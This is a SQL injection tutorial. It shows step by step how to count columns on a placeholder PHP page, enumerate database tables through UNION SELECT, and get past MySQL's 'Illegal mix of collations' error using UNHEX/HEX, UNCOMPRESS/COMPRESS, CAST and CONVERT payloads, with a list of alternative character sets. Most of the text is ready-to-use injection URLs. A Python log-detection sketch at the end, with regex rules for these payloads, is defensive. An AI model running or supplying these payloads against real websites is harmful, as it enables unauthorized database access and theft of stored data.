SQL Injection - How to Bypass Illegal Mix of Collations

In this tutorial you will learn how to bypass the "Illegal mix of collations" error.

Let's start with a regular SQL injection.

Our target:

http://www.Site.com/detail.php?id=31

First we have to count how many columns it has.

http://www.Site.com/detail.php?id=31 order by 1-- -

No error.

http://www.Site.com/detail.php?id=31 order by 4-- -

No error.

http://www.Site.com/detail.php?id=31 order by 6-- -

We got an error here:

Unknown Column '6' in 'order by'

Let's reduce the column count.

http://www.Site.com/detail.php?id=31 order by 5-- -

No error.

There are 5 columns, so let's prepare our UNION SELECT statement and find the vulnerable columns.

http://www.Site.com/detail.php?id=31 and 0 Union Select 1,2,3,4,5-- -

We got 2 and 3, so columns 2 and 3 are the ones displayed on the page.

Let's try to get the tables.

http://www.Site.com/detail.php?id=31 and 0 Union Select 1,concat(table_name),3,4,5 from information_schema.tables where table_schema=database()-- -

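Oops! We got an error here:

Illegal mix of collations for operation 'UNION'

Bypassing Illegal Mix of Collations

The error means the string column returned by the original query and the value we selected in the same position of the UNION have collations that MySQL cannot reconcile. Each method below converts our value to a binary string or to another character set before the UNION combines the columns.

Here are some methods we can use to bypass the illegal mix of collations for operation 'UNION' error: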



1. Using UNCOMPRESS(COMPRESS(our_query_here))

http://www.Site.com/detail.php?id=31 and 0 Union Select 1,uncompress(compress(concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()-- -

BYPASSED!

2. Using UNHEX(HEX(our_query_here))

http://www.Site.com/detail.php?id=31 and 0 Union Select 1,unhex(hex(concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()-- -

BYPASSED!

3. Using CAST()

http://www.Site.com/detail.php?id=31 and 0 Union Select 1,cast(table_name as binary),3,4,5 from information_schema.tables where table_schema=database()-- -

BYPASSED!

4. Using CONVERT()

http://www.Site.com/detail.php?id=31 and 0 Union Select 1,convert(table_name using ascii),3,4,5 from information_schema.tables where table_schema=database()-- -

BYPASSED!

Some Advanced Options for CONVERT()

If ascii doesn't work in the CONVERT() function, we can use one of these character sets instead of ascii:
ujis
ucs2
tis620
swe7
sjis
macroman
macce
latin7
latin5
latin2
koi8u
koi8r
keybcs2
hp8
geostd8
gbk
gb2312
armscii8
ascii
cp1250
big5
cp1251
cp1256
cp1257
cp850
cp852
cp866
cp932
dec8
euckr
latin1
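
On the detection side, the four wrappers above leave a recognizable trace in web server logs. The following Python sketch is an added example, not part of the original tutorial: it tags request lines that combine UNION SELECT with one of those charset-coercion wrappers. The rule names, function names and sample request lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed request lines for illustration; not taken from a real log.
SAMPLE_REQUESTS = [
    "/detail.php?id=31",
    "/detail.php?id=31%20order%20by%206--%20-",
    "/detail.php?id=31+and+0+Union+Select+1,unhex(hex(concat(table_name))),3,4,5"
    "+from+information_schema.tables+where+table_schema=database()--+-",
    "/detail.php?id=31 and 0 Union Select 1,convert(table_name using ascii),3,4,5"
    " from information_schema.tables where table_schema=database()-- -",
    "/news.php?title=European+Union+select+committee",
]

# Patterns run against the decoded, lower-cased, whitespace-collapsed query string.
RULES = {
    "order_by_probe": re.compile(r"\border by \d+"),
    "union_select": re.compile(r"\bunion (all )?select\b"),
    "schema_enumeration": re.compile(r"\binformation_schema\b"),
    # The four wrappers from this page that force a column into another charset.
    "charset_coercion": re.compile(
        r"\buncompress ?\( ?compress ?\(|\bunhex ?\( ?hex ?\("
        r"|\bcast ?\(.{0,200}?\bas binary\b|\bconvert ?\(.{0,200}?\busing \w+"
    ),
}

def normalize(raw_query: str) -> str:
    """URL-decode, collapse whitespace and lower-case so rules match mixed case."""
    return re.sub(r"\s+", " ", unquote_plus(raw_query)).lower()

def classify(request: str) -> list[str]:
    """Return the names of all rules that fire on the request's query string."""
    query = normalize(request.partition("?")[2])
    return [name for name, rule in RULES.items() if rule.search(query)]

def is_collation_bypass(request: str) -> bool:
    """High-confidence signal: UNION SELECT plus a charset-coercion wrapper."""
    tags = classify(request)
    return "union_select" in tags and "charset_coercion" in tags

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(is_collation_bypass(line), classify(line), line[:60])
```

The last sample shows why the combined check matters: ordinary text can trip the `union_select` rule alone, but not together with a coercion wrapper.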
